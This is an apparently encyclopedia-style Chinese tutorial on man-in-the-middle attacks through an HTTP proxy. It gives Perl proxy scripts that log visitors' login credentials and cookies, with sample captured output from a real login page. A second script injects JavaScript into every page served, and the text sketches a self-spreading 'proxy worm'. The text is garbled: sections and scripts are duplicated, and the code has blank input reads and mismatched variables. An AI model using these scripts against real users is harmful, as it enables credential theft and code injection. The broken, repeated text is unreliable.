MITM攻擊,即中間人攻擊(Man-in-the-middle-attacks,簡稱:MITM攻擊),是一種電腦黑客的攻擊模式。
基本介紹
- 中文名: MITM攻擊
- 外文名:Man-in-the-middle-attacks
- 實例說明:截取敏感數據
- 攻擊類型:截取敏感數據
- 原理:經過proxy server 轉發
前言,原理,攻擊類型,實例說明,小結,
前言
說起“中間人攻擊(Man-in-the-middle-attacks,簡稱:MITM攻擊)”大家可能馬上想起曾經風靡一時的SMB會話劫持,DNS欺騙等技術,這些都是典型的MITM攻擊手段。其實MITM攻擊說它是一種手段,不如說它是一種攻擊模式,它可以套用於各個領域,比如在現實中,A通過B給C傳話,那么B在傳話給C的時候,可以誇大其詞,也可以填油加醋後傳給C,在這個過程中中間人B 無意中就來一次MITM攻擊,其實“謠言”就是這么來的 J. 具體在網路安全方面 ,MITM攻擊套用也很廣泛,下面我就以http協定代理來介紹下代理里MITM攻擊。
原理
代理服務的一個典型模型:
client <Proxy ServerWeb Server
middle man
上面可以看出:client 發出的請求 和 web server返回的數據都經過proxy server 轉發,這個proxy server 就起到了一個middle man的作用,如果這個“中間人” 夠黑,那么整個代理過程的數據 都可以由這個“中間人”控制。
client <Proxy ServerWeb Server
middle man
上面可以看出:client 發出的請求 和 web server返回的數據都經過proxy server 轉發,這個proxy server 就起到了一個middle man的作用,如果這個“中間人” 夠黑,那么整個代理過程的數據 都可以由這個“中間人”控制。
攻擊類型
截取敏感數據
代碼注射
Proxp worm
其他利用
代碼注射
Proxp worm
其他利用
實例說明
1.截取敏感數據
首先我們編寫一個“惡意的中間人” 代理程式:
以下是代碼片段:
=============================codz start===============================
#!/usr/bin/perl
#proxy mid-man-atk Test script
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1;
my $server = IO::Socket::INET->new (
LocalPort => 8080,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
while (my $browser = $server->accept()) {
print "\n\n--------------Clint提交數據-------------------\n";
binmode $browser;
my $method ="";
my $content_length = 0;
my $content = 0;
my $ACCU_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
while (my $browser_line = ) {
unless($method) {
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;
my $uri = URI->new($hostAddr);
$host = IO::Socket::INET->new (
PeerAddr=> $uri->host,
PeerPort=> $uri->port );
die "couldn’t open $hostAddr" unless $host;
if ($showOpenedSockets) {
print "Opened ".$uri->host." , port ".$uri->port."\n";
}
binmode $host;
print $host "$method ".$uri->path_query." $httpVer\n";
print "$method ".$uri->path_query." $httpVer\n";
next;
}
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
$accu_content_length+=length $browser_line;
print $browser_line;
print $host $browser_line;
last if $browser_line =~ /^\s*$/ and $method ne ’POST’;
if ($browser_line =~ /^\s*$/ and $method eq "POST") {
$content = 1;
last unless $content_length;
next;
}
if ($content) {
$accu_content_length+=length $browser_line;
last if $accu_content_length >= $content_length;
}
}
print "\n\n................Serve返回數據.................xx\n";
$content_length = 0;
$content = 0;
$accu_content_length = 0;
my @ret= ;
foreach my $host_line (@ret){
print $host_line;
print $browser $host_line;
$content_length = $1 if $host_line=~/Content-length: +(\d+)/i;
if ($host_line =~ m/^\s*$/ and not $content) {
$content = 1;
#last unless $content_length;
next;
}
if ($content) {
if ($content_length) {
$accu_content_length+=length $host_line;
print "\nContent Length: $content_length, accu: $accu_content_length\n";
last if $accu_content_length >= $content_length;
}
}
}
$browser-> close;
$host -> close;
}
=============================codz end===============================
運行此腳本把結果保存到test.log:
C:\usr\bin>perl proxytest1.pl >>test.log
然後Clinet使用次代理訪問http://reg.163.com/CheckUser.jsp 登入
打開test.log得到如下數據:
--------------Clint提交數據-------------------
Opened reg.163.com , port 80
POST /CheckUser.jsp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://reg.163.com/CheckUser.jsp
…….省略…….
Cookie: URSJESSIONID=b370cQyLDya7
…….省略…….
url=&username=hack-520&password=*****&submit=%B5%C7%A1%A1%C2%BC
................Serve返回數據.................xx
HTTP/1.1 200 OK
如下圖所示:
成功得到
username=hack-520
password=*****
以下是代碼片段:
=============================codz start===============================
#!/usr/bin/perl
#proxy mid-man-atk Test script
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1;
my $server = IO::Socket::INET->new (
LocalPort => 8080,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
while (my $browser = $server->accept()) {
print "\n\n--------------Clint提交數據-------------------\n";
binmode $browser;
my $method ="";
my $content_length = 0;
my $content = 0;
my $ACCU_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
while (my $browser_line = ) {
unless($method) {
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;
my $uri = URI->new($hostAddr);
$host = IO::Socket::INET->new (
PeerAddr=> $uri->host,
PeerPort=> $uri->port );
die "couldn’t open $hostAddr" unless $host;
if ($showOpenedSockets) {
print "Opened ".$uri->host." , port ".$uri->port."\n";
}
binmode $host;
print $host "$method ".$uri->path_query." $httpVer\n";
print "$method ".$uri->path_query." $httpVer\n";
next;
}
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
$accu_content_length+=length $browser_line;
print $browser_line;
print $host $browser_line;
last if $browser_line =~ /^\s*$/ and $method ne ’POST’;
if ($browser_line =~ /^\s*$/ and $method eq "POST") {
$content = 1;
last unless $content_length;
next;
}
if ($content) {
$accu_content_length+=length $browser_line;
last if $accu_content_length >= $content_length;
}
}
print "\n\n................Serve返回數據.................xx\n";
$content_length = 0;
$content = 0;
$accu_content_length = 0;
my @ret= ;
foreach my $host_line (@ret){
print $host_line;
print $browser $host_line;
$content_length = $1 if $host_line=~/Content-length: +(\d+)/i;
if ($host_line =~ m/^\s*$/ and not $content) {
$content = 1;
#last unless $content_length;
next;
}
if ($content) {
if ($content_length) {
$accu_content_length+=length $host_line;
print "\nContent Length: $content_length, accu: $accu_content_length\n";
last if $accu_content_length >= $content_length;
}
}
}
$browser-> close;
$host -> close;
}
=============================codz end===============================
運行此腳本把結果保存到test.log:
C:\usr\bin>perl proxytest1.pl >>test.log
然後Clinet使用次代理訪問http://reg.163.com/CheckUser.jsp 登入
打開test.log得到如下數據:
--------------Clint提交數據-------------------
Opened reg.163.com , port 80
POST /CheckUser.jsp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://reg.163.com/CheckUser.jsp
…….省略…….
Cookie: URSJESSIONID=b370cQyLDya7
…….省略…….
url=&username=hack-520&password=*****&submit=%B5%C7%A1%A1%C2%BC
................Serve返回數據.................xx
HTTP/1.1 200 OK
如下圖所示:
成功得到
username=hack-520
password=*****
2.代碼注射
在使用代理的整個過程里,最終是通過代理伺服器把數據發給clinet,這個數據是我們可以控制的,我們可以注射我們的惡意代碼提交給clinet,修改上面的perl程如下:
以下是代碼片段:
=============================codz start===============================
#!/usr/bin/perl
#proxy mid-man-atk Test script
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1;
my $server = IO::Socket::INET->new (
LocalPort => 8080,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
while (my $browser = $server->accept()) {
print "\n\n--------------------------------------------\n";
binmode $browser;
my $method ="";
my $content_length = 0;
my $content = 0;
my $accu_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
while (my $browser_line = ) {
unless ($method) {
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;
my $uri = URI->new($hostAddr);
$host = IO::Socket::INET->new (
PeerAddr=> $uri->host,
PeerPort=> $uri->port );
die "couldn’t open $hostAddr" unless $host;
if ($showOpenedSockets) {
print "Opened ".$uri->host." , port ".$uri->port."\n";
}
binmode $host;
print $host "$method ".$uri->path_query." $httpVer\n";
print "$method ".$uri->path_query." $httpVer\n";
next;
}
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
$accu_content_length+=length $browser_line;
print $browser_line;
print $host $browser_line;
last if $browser_line =~ /^\s*$/ and $method ne ’POST’;
if ($browser_line =~ /^\s*$/ and $method eq "POST") {
$content = 1;
last unless $content_length;
next;
}
if ($content) {
$accu_content_length+=length $browser_line;
last if $accu_content_length >= $content_length;
}
}
print "\n\nxx....................................xx\n";
$content_length = 0;
$content = 0;
$accu_content_length = 0;
my @ret= ;
my $ret=@ret;
push(@ret,""); #〈=注意這裡
foreach my $host_line (@ret){
print $host_line;
print $browser $host_line;
$content_length = $1 if $host_line=~/Content-length: +(\d+)/i;
if ($host_line =~ m/^\s*$/ and not $content) {
$content = 1;
#last unless $content_length;
next;
}
if ($content) {
if ($content_length) {
$accu_content_length+=length $host_line;
print "\nContent Length: $content_length, accu: $accu_content_length\n";
last if $accu_content_length >= $content_length;
}
}
}
$browser-> close;
$host -> close;
}
=============================codz end===============================
代碼:
my @ret= ;
my $ret=@ret;
push(@ret," alert(\"superhei\") "); #〈=注意這裡
這個在代理服務最終把webserver返回的數據里 注射了代碼 alert("superhei") 。
運行上面的程式,當clinet用此代理伺服器訪問任意站時都回執行 alert("superhei")
如圖2:
以下是代碼片段:
=============================codz start===============================
#!/usr/bin/perl
#proxy mid-man-atk Test script
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1;
my $server = IO::Socket::INET->new (
LocalPort => 8080,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
while (my $browser = $server->accept()) {
print "\n\n--------------------------------------------\n";
binmode $browser;
my $method ="";
my $content_length = 0;
my $content = 0;
my $accu_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
while (my $browser_line = ) {
unless ($method) {
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;
my $uri = URI->new($hostAddr);
$host = IO::Socket::INET->new (
PeerAddr=> $uri->host,
PeerPort=> $uri->port );
die "couldn’t open $hostAddr" unless $host;
if ($showOpenedSockets) {
print "Opened ".$uri->host." , port ".$uri->port."\n";
}
binmode $host;
print $host "$method ".$uri->path_query." $httpVer\n";
print "$method ".$uri->path_query." $httpVer\n";
next;
}
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
$accu_content_length+=length $browser_line;
print $browser_line;
print $host $browser_line;
last if $browser_line =~ /^\s*$/ and $method ne ’POST’;
if ($browser_line =~ /^\s*$/ and $method eq "POST") {
$content = 1;
last unless $content_length;
next;
}
if ($content) {
$accu_content_length+=length $browser_line;
last if $accu_content_length >= $content_length;
}
}
print "\n\nxx....................................xx\n";
$content_length = 0;
$content = 0;
$accu_content_length = 0;
my @ret= ;
my $ret=@ret;
push(@ret,""); #〈=注意這裡
foreach my $host_line (@ret){
print $host_line;
print $browser $host_line;
$content_length = $1 if $host_line=~/Content-length: +(\d+)/i;
if ($host_line =~ m/^\s*$/ and not $content) {
$content = 1;
#last unless $content_length;
next;
}
if ($content) {
if ($content_length) {
$accu_content_length+=length $host_line;
print "\nContent Length: $content_length, accu: $accu_content_length\n";
last if $accu_content_length >= $content_length;
}
}
}
$browser-> close;
$host -> close;
}
=============================codz end===============================
代碼:
my @ret= ;
my $ret=@ret;
push(@ret," alert(\"superhei\") "); #〈=注意這裡
這個在代理服務最終把webserver返回的數據里 注射了代碼 alert("superhei") 。
運行上面的程式,當clinet用此代理伺服器訪問任意站時都回執行 alert("superhei")
如圖2:
3.Proxyworm的實現
如果上面的例子在配合其他的客戶端攻擊(如網頁木馬),那么就可以實現proxy worm了:
proxyworm--àclinet(proxyworm1)-àclinet1(proxyworm2)-à…..à
clinet1在使用了proxyworm代理後,proxyworm向clinet注射可以讓clinet下載並運行自身的代碼,clinet被攻擊後成為了proxyworm1 ……..。
proxyworm--àclinet(proxyworm1)-àclinet1(proxyworm2)-à…..à
clinet1在使用了proxyworm代理後,proxyworm向clinet注射可以讓clinet下載並運行自身的代碼,clinet被攻擊後成為了proxyworm1 ……..。
4.其他套用
技術都又它的雙面性,我們和可以利用在安全方面:比如惡意代碼過慮平台:webserve 返回的數據經過代理伺服器時 經過過濾在 傳送給 clinet
………
………
小結
其實Man-in-the-middle-attacks是個很大的課題,在很多方面都提到,
本文只是淺顯的通過http協定代理介紹了下“代理中間人攻擊技術”, 如果有興趣的朋友可以研究下 其他協定“代理中間人攻擊技術”。
本文只是淺顯的通過http協定代理介紹了下“代理中間人攻擊技術”, 如果有興趣的朋友可以研究下 其他協定“代理中間人攻擊技術”。
